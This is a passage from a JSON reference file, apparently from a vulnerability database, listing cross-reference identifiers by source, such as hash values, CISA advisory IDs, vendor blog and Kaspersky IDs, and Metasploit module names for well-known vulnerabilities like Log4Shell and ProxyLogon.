"7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", 
"801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "870093D07F2D1BC6903F68758BFC9ABE9984CCE5FE2C013D13AC7FB645217C4D", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "88EAAD0F3FB0FE6AFDEDC902492B56BAAD194DB4D47D9DD8F7935300FABD0D33", "893374FE903D82E10726F93A8E126C72248B18315149992024525319951E3097", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8DEEAD8DA516A3D90C452CB6D6FD352EDA61B3536DB4FAD22E6E364FDA001606", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "906C6E45A71E8A432DE51C6A94712DDA0BBA3529963A8AFA9DCFE84E05DA7425", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", 
"92653814B5AD58699CB141C05798FBA49CD5D97ED94F23B96F6DFAA714EA627D", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9BFFF73DB09075877DB19A13994A90F7D1CF13A8A5601B84DC0B84F8193E65C1", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A054C15A595076E4A1D7AA4BC92F46B107013032C98CAEE03D3F4ED79AE98370", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A15B390D080295157749FA22EBE90BAA7A33E1EC803752A1824ADBE8D7353A10", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", 
"A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABB0647A990D7F58EF2C3F027E8FF9EC3CFCBCFED6191131D99DFB361EAE80DA", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "AC9F2A66DF69281160228F889374ECE84DEF1729FFE72F3F738F15249648412B", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", 
"B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C4FDEDC3D060EDF89606BFC32AA0B02B8F40EF19D70E9CAD79641186FFE43357", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C80232268E47B2638A1602C3F974312D284C64B656468B785AFD070887CF6B6B", 
"C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "C8FEEACA92A2A3DA942D806A8DD1A62D9FF588BC8511496B60CEDE2A43134314", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CA879CAC5D259DF9801958C7109627A6039185F7E73D37875A7DA78F5F176A68", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D156BD5A77A183961676EA2393F58C31A72725CEC216EB199E31487998BE491C", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D765B0E424B32B58901509C0B37E90B68BD6A9A3ED95D1DE2E1DF2893F546155", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", 
"DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E1A56F82327D8FB00BD84085E673D1401848A384A92C33B13DC0ED642E86946B", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E3E6FF1C4B7407C34CEF6142D8E94DDAFD4C205B712F9DB877A5A5023358CB67", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4452F8B377A6318D5E140C5FE8BCE8A991964A95AC77F047C30B4542034429F", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "E9875BEF8E97815B76ED1D0FD7D59E5669EDACF80D617A93E84594F2257B2901", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED25520B668714457490EC7907530FE368D1DD7120FD7A98A7598F3BBE3A9333", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", 
"EE50B1A5AF778319698593697BE11C93BF03E19DEE9CE25FF7BD2F12582783CA", "EE96B54621D843DBAEC73E1584C38A5C7C93422115268CA4F14F24F6540CB3F6", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F122C27179362A817F8CF31FDC2906DEDD7B8BBEA33D06FFA42180F0625D22E0", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F1ED0852D75B26B636AE97EEEDFC15EBA6FD53059DB84EDE5C24543996C89A7F", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC10782A879F5738FDF43855B83775F2332A626EC335AD556DA5907A2CB0B2E9", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEADDA47EFE90B54452280140F698F39B3035C331C1D98DE94C00F9304C7DEFC", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", 
"FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["AA19-339A", "AA20-010A", "AA20-020A", "AA20-031A", "AA20-099A", "AA20-107A", "AA20-126A", "AA20-133A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-283A", "AA20-296A", "AA21-062A", "AA21-110A", "AA21-116A", "AA21-200B", "AA21-209A", "AA21-321A", "AA21-356A", "AA22-011A", "AA22-047A", "AA22-055A", "AA22-117A", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-257A", "AA22-277A", "AA22-279A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-040A", "AA23-136A", "AA23-165A", "AA23-215A", "AA23-250A", "ICSA-14-269-01A", "ICSA-15-344-01", "ICSA-15-344-01B", "ICSA-21-357-02", "ICSA-22-034-01", "ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:937EDF98C40EFDDA392CC06661F152F0", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:D1F1D344B2FD670184AA4FB99A50BD1B", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA10995", "KLA11024", "KLA11059", "KLA11069", "KLA11139", 
"KLA11170", "KLA11241", "KLA11835", "KLA11894", "KLA11902", "KLA11929", "KLA11931", "KLA12103", "KLA12169", "KLA12224", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1680589374755422772", "KITPLOIT:1907207623071471216", "KITPLOIT:2779031464033627796", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5104415481503400470", "KITPLOIT:5420210148456420402", "KITPLOIT:6411625084720414057", "KITPLOIT:648469287269586263", "KITPLOIT:6759391622067035795", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:7847586937102427883", "KITPLOIT:866017936175971203", "KITPLOIT:8672599587089685905", "KITPLOIT:9146046356497464176", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:0C41B2B6F52FFC252ABCE6236C6350E0", "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "lenovo", "idList": ["LENOVO:PS500044-GNU-BOURNE-AGAIN-SHELL-BASH-SHELLSHOCK-NOSID", "LENOVO:PS500044-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2014-0388", "MGASA-2014-0393", "MGASA-2020-0380", "MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2023-0141"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "MALWAREBYTES:21860B5266FF4C6017A8B388973F2911", "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", 
"MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:3067D03AD5A4441FEBB702BADFD6C4A1", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:6C5219B55CB625F7D9D16F7CD92E526C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:C7D9126F912DAC06B9FBA1B29BF174BC", "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DA40246EC094218998CD2BD24735C7A6", 
"MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-APACHE_MOD_CGI_BASH_ENV-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-ADVANTECH_SWITCH_BASH_ENV_EXEC-", "MSF:EXPLOIT-LINUX-HTTP-IPFIRE_BASHBUG_EXEC-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-MULTI-BROWSER-JAVA_ATOMICREFERENCEARRAY-", "MSF:EXPLOIT-MULTI-BROWSER-JAVA_VERIFIER_FIELD_ACCESS-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_MOD_CGI_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-CUPS_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-", "MSF:EXPLOIT-WINDOWS-BROWSER-MS13_022_SILVERLIGHT_SCRIPT_OBJECT-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:89789F73D15A0B331512F90F7E692851", 
